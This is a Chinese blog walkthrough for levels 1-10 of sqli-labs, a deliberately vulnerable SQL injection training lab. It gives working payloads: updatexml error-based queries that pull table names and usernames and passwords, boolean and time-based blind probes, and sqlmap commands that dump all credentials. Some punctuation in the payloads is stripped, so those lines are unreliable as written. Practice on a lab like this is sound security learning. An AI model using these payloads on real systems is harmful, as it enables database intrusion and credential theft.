当前位置：首页 > article >正文

sqli-labs通关指南（1-10）

article 2026/5/7 1:55:08

sqli-labs通关指南1-10get提交url类型数据长度2k35 优点速度非常快缺点不安全明文传输post提交请求体传输数据长度无限制安全性高速度比get慢浏览器不缓存数据less1Please input the ID as parameter with numeric value-请输入ID作为登陆值http://localhost/sqli-labs/Less-1/?id1后面ID的值可以自定义不同的id对应不同的用户。这里我尝试使用http://localhost/sqli-labs/Less-1/?id-1 or 11 #也可以成功。但是查看源码index.php之后可以发现这一次的查询是字符型查询区别就是http://localhost/sqli-labs/Less-1/?id-1 and 12也是可以正确执行的但是你或许会有疑问就是当你进行替换的时候id1 and 12’可以正常执行但是执行id-0却不可以产生这个疑问的原因就是与操作有一个为假整体为假。这里解释一下是因为SQL不会对字符类型中的语句进行任何操作只是简单的替换然后将字符型转换为数字型取字符型中的第一个元素也就是1后面的就不要了。less2 、3、4同上区别就是less2是数字型执行http://localhost/sqli-labs/Less-1/?id-1 and 12就会报错。但是一开始我们肯定不知道所以都用数字型是最好的个人认为less5继续输入?id1回显正常执行?id1 and 12发现页面也正常那么这应该考虑引号闭合问题使用?id1’ and 11 --得知市单引号闭合然后尝试盲注?id 1 order by 1~3 都可以正常访问修改id-1 union select 1,2,3 并不会回显内容所以尝试别的方法。方法介绍updatexml()更新xml文档的函数语法updatexml(目标xml内容xml文档路径更新的内容)实际使用updatexml( 随便写 , 要查的数据 , 随便写 )concat() 联合函数把内容拼接到一起0x7e ~ 作用就是回显的时候库名会被~包裹起来可以一眼看到信息?id1’ and updatexml(1,concat(0x7e,database(),0x7e),1) --通过添加不合法内容故意让想要的信息在报错中显示出来接下来执行?id1’ and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),0x7e),1) --核心语句select group_concat(table_name) from information_schema.tables where table_schemadatabase()为什么使用group_concat因为如果不使用页面内容就是超过一行但是不显示内容所以使用group_concat就会使得内容在一行显示。通过该语句查询到表名emails,referers,uagents,users信息一般是在user中依次执行一下命令?id1’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_name‘users’),0x7e),1) --?id1’ and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e,(select password from users limit 0,1),0x7e),1) --也许你有疑问我记不住啊巧了我也记不住我也是网上搜的~哈哈哈less6同上但单引号双引号即可自己多动手敲一敲万一就记住了呢。less7新类型经过尝试可以知道该闭合方式应该是1’)) --但是必须修改文件才能完成这里我不想修改文件毕竟真实场景怎么会去修改人家的源文件才能做所以还是采用上面的方法less8这题用盲注解题首先了解一下盲注使用的函数length() 返回字符串长度substr() 截取字符串ascii() 返回字符串的ASCII码值sleep() 将程序挂起一段时间if(exp1,exp2,exp3) 判断语句如果第一个正确就执行第二个语句如果错误就执行第三个语句类似三目运算符执行语句?id1’ and length(database())8– 说明长度为8?id1’ and ascii(substr(database(),1,1))115– 说明第一个字符是s依次爆破。得到结果security?id1’ and exists(select * from information_schema.tables where table_name‘users’ and table_schemadatabase())– 说明user表存在?id1’ and exists(select username from users)– 说明该字段存在依次猜下去当然是有脚本的这一个一个猜太麻烦了。打开Kali自带sqlmap 执行命令sqlmap -u “http://你客户端的IP/sqli-labs/Less-8/?id1” --technique B --batch --dump这里解释一下参数-u 指定靶场地址–technique B 指定类型这里是布尔盲注–batch 自动确认所有选项默认是Y–dump 直接导出所有账号密码运行结束往上翻翻会有所有的账户信息less9这里使用时间盲注但是你会有疑问为什么怎么潘判断的我也有这样的疑问于是搜了一下可以总结为以下情况显示报错信息的----可以报错注入页面的显示要么正常要么不正常的只有真假两种情况 —布尔盲注页面无论你输入什么对与不对都是一个样—时间盲注再回来看我尝试?id-1’ and 12 --也是可以正常显示所以判断为时间盲注时间盲注的解题方法跟布尔盲注一样改一下参数sqlmap -u “http://客户端IP/sqli-labs/Less-2/?id1” --technique T --batch --dump慢非常慢less10同上

sqli-labs通关指南（1-10）

相关文章：

sqli-labs通关指南（1-10）

Windows系统性能优化原理与实战

开发者技能管理工具：从YAML定义到可视化部署的完整实践

别再当期刊 “陪跑者” 了！Paperxie 期刊写作，把投稿踩坑率降到最低

3步打造你的智能笔记助手：Obsidian插件从零到精通指南

终端AI助手tAI：命令行集成AI，提升开发者效率

ClawProxy：将OpenClaw智能体无缝接入OpenAI生态的代理桥梁

LocalAI：开源本地大模型推理服务器，兼容OpenAI API的私有化部署方案

从网卡到GPU：拆解你电脑里的PCIe 4.0 x16链路，看懂Switch如何让多设备协同工作

Cursor Rules：为AI编程助手定制团队开发规范，提升代码质量与一致性

告别假阳性！用Cuckoo Filter（布谷鸟过滤器）优化你的LSM-Tree存储引擎

国产旗舰AI“西方垃圾思维中毒”反超欧美原生模型：TOP30榜单揭示认知殖民化困境

2026年哪款充电宝性价比高？充电宝性价比最高的十大品牌推荐！

观察 Taotoken 透明计费如何帮助精准预测月度 AI 调用预算

Arm Cortex-R82缓存与TLB管理机制详解

告别时间漂移：手把手教你用RX8111CE RTC芯片实现高精度时间戳（附I2C驱动避坑指南）

开源项目国际化文档协作：从工具链到社区运营的完整实践指南

Simulink仿真别再怕数据丢失了！手把手教你用Data Store Memory实现全局变量

使用技巧（二）：claude-hud 没装等于裸奔！4 款上下文仪表盘横评，这一款 21K Star 直接用

SimCLR实战踩坑记录：我的batch size为什么上不去？温度参数t到底怎么调？

权威榜单2026年上海做小程序哪家好，实地测评这几家靠谱公司真心值得推荐

AI编程助手成本优化实战：7项技能节省60% API开销

Stripe科里森 X OpenAI奥特曼的长谈

MySQL编写触发器如何保证数据完整性_逻辑校验规则设置

告别系统软键盘！手把手教你为Qt应用定制一个高颜值、全功能的虚拟键盘（支持Win/Linux）

openharmony源码编译之修改分区大小指南

2026届必备的AI学术平台横评

BilibiliDown：三分钟掌握B站视频下载的终极指南

资源管理模块的实践开发日志

Fish Shell技能管理框架：构建可复用命令行工具生态